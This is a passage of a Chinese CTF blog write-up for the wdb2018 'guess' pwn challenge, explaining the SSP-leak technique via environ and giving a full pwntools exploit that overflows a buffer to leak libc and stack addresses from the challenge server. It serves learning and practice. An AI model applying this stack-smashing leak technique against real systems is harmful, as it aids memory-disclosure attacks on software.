<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">libc_base = puts_addr - libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">environ_addr = libc_base + libc.sym[<span class="string">&#x27;environ&#x27;</span>]</span><br><span class="line"><span class="comment"># environ 是 Linux 系统里的一个全局变量，它存着当前进程的所有环境变量的内存地址。</span></span><br><span class="line">log.warn(<span class="string">&quot;libc_base -&gt; &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br></pre></td></tr></table></figure>

<ul>
<li>environ 的特性：environ 是一个全局变量，它存放在 Libc 的数据段中（所以它的地址可以通过 libc_base + libc.sym[‘environ’] 精确计算出来）。最关键的是，environ 里面存储的值，是一个指向环境变量的指针，而环境变量是存放在高地址的栈（Stack）上的。</li>
<li>动作： 把 argv[0] 指针覆盖为 environ_addr。</li>
<li>程序报错时， environ 指向栈，会去读取 environ 指向的内容，于是就把栈的地址打印出来了！</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span> + p64(environ_addr)</span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.recvuntil(<span class="string">&quot;stack smashing detected ***: &quot;</span>)</span><br><span class="line">stack_addr = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)) <span class="comment"># - ???</span></span><br><span class="line">log.warn(<span class="string">&quot;stack_addr -&gt; &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line"><span class="comment">#gdb.attach(r)</span></span><br><span class="line">payload3 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span>+p64(stack_addr)</span><br><span class="line">r.sendline(payload3)</span><br></pre></td></tr></table></figure>

<p>先接收栈的地址，寻找栈和</p>
<img src="/HFTTC.github.io/images/pwn/1774780966947-71cd5979-2a72-46bd-868f-ffffba5d9120-146621.png" alt="1774780966947-71cd5979-2a72-46bd-868f-ffffba5d9120.png" style="max-width: 100%; display: block; margin: 0 auto;">

<p>0xf78 - 0xe70 &#x3D; 0x168 两个地址差为 0x168 所以上面的 exp 应该是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span> + p64(environ_addr)</span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.recvuntil(<span class="string">&quot;stack smashing detected ***: &quot;</span>)</span><br><span class="line">stack_addr = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x168</span></span><br><span class="line">log.warn(<span class="string">&quot;stack_addr -&gt; &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line"><span class="comment">#gdb.attach(r)</span></span><br><span class="line">payload3 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span>+p64(stack_addr)</span><br><span class="line">r.sendline(payload3)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># from LibcSearcher import LibcSearcher</span></span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line">binary = <span class="string">&#x27;./GUESS&#x27;</span></span><br><span class="line">r = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27431</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;x64libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment">#r = process(binary)</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;Please type your guessing flag&quot;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span>+p64(puts_got)</span><br><span class="line"><span class="comment">#gdb.attach(r)</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;stack smashing detected ***: &quot;</span>)</span><br><span class="line">puts_addr = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line">libc_base = puts_addr - libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">environ_addr = libc_base + libc.sym[<span class="string">&#x27;environ&#x27;</span>]</span><br><span class="line"><span class="comment"># environ 是 Linux 系统里的一个全局变量，它存着当前进程的所有环境变量的内存地址。</span></span><br><span class="line">log.warn(<span class="string">&quot;libc_base -&gt; &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span> + p64(environ_addr)</span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.recvuntil(<span class="string">&quot;stack smashing detected ***: &quot;</span>)</span><br><span class="line">stack_addr = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x168</span></span><br><span class="line">log.warn(<span class="string">&quot;stack_addr -&gt; &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line"><span class="comment">#gdb.attach(r)</span></span><br><span class="line">payload3 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span>+p64(stack_addr)</span><br><span class="line">r.sendline(payload3)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h3 id=""><a href="#" class="headerlink" title=""></a></h3><blockquote>
<p>更新: 2026-03-29 22:08:41<br>原文: <a target="_blank" rel="noopener" href="https://www.yuque.com/idcm/wnemg9/tdof1cdghf9huxok">https://www.yuque.com/idcm/wnemg9/tdof1cdghf9huxok</a></p>
</blockquote>

    </div>
    <footer class="article-footer">
      
      
    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
            <img data-src="/HFTTC.github.io/images/banner.webp" data-sizes="auto" alt="[ISCC2024]chaos_plus(堆栈结合)" class="lazyload">
        <a href="/HFTTC.github.io/2026/04/28/%5BISCC2024%5Dchaos_plus(%E5%A0%86%E6%A0%88%E7%BB%93%E5%90%88)/" aria-label="前一篇: [ISCC2024]chaos_plus(堆栈结合)" title="前一篇: [ISCC2024]chaos_plus(堆栈结合)"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
            [ISCC2024]chaos_plus(堆栈结合)
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
          <img data-src="/HFTTC.github.io/images/banner.webp" data-sizes="auto" alt="glibc-2.32malloc()_unalignedtcachechunkdetected" class="lazyload">
      <a href="/HFTTC.github.io/2026/04/28/glibc-2.32malloc()_unalignedtcachechunkdetected/" aria-label="后一篇: glibc-2.32malloc()_unalignedtcachechunkdetected"  title="后一篇: glibc-2.32malloc()_unalignedtcachechunkdetected"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
          glibc-2.32malloc()_unalignedtcachechunkdetected
      </h3>
    </div>
  </nav>

</article>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2026
        <span class="footer-info-sep rotate"></span>
      SEZUVEM=
    </div>
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        292.6k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        24:34
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SSP-Leak-Fork"><span class="toc-number">1.</span> <span class="toc-text">SSP Leak &amp; Fork</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#96%EF%BC%89wdb2018-guess-Fork-SSP-Leak-environ"><span class="toc-number">1.1.</span> <span class="toc-text">96）wdb2018_guess(Fork&amp;SSP Leak&amp;environ)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp-%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">exp 思路：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-number">1.3.</span> <span class="toc-text"></span></a></li></ol></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/HFTTC.github.io/avatar/head.jpg" data-sizes="auto" alt="SEZUVEM=" class="lazyload">
  <div class="sidebar-author-name">SEZUVEM=</div>
  <div class="sidebar-description">心之所向，无问西东</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">198</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">0</div>
  </div>
</div>
<div class="sidebar-social" >
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/HFTTC.github.io/js/script.js"></script>


  
<script src="/HFTTC.github.io/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/HFTTC.github.io/js/pjax_script.js" data-pjax></script>




  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>






<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "SEZUVEM=",
          title: "SSPLeak&amp;Fork",
          url: "https://idcm-svg.github.io/HFTTC.github.io/2026/04/28/SSPLeak&amp;Fork/",
          excerpt: "",
          description: "",
          stripContent: "SSP Leak &amp;amp; Fork96）wdb2018_guess(Fork&amp;amp;SSP Leak&amp;amp;environ)  12345678910111213141516171819202122232425262728293031323334353637383940414243__int64 __fastcall main(__int64 a1, char **a2, char **a3)&amp;#123;    __WAIT_STATUS stat_loc; // [rsp+14h] [",
          date: "Tue Apr 28 2026 19:14:15 GMT+0800",
          updated: "Tue Apr 28 2026 19:19:30 GMT+0800",
          cover: "/HFTTC.github.io/images/banner.webp",
        };
      </script>
        
<script src="/HFTTC.github.io/js/insert_highlight.js" data-pjax></script>

      
<script src="/HFTTC.github.io/js/tabs.js" data-pjax defer></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        


  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>




  </body>
  </html>
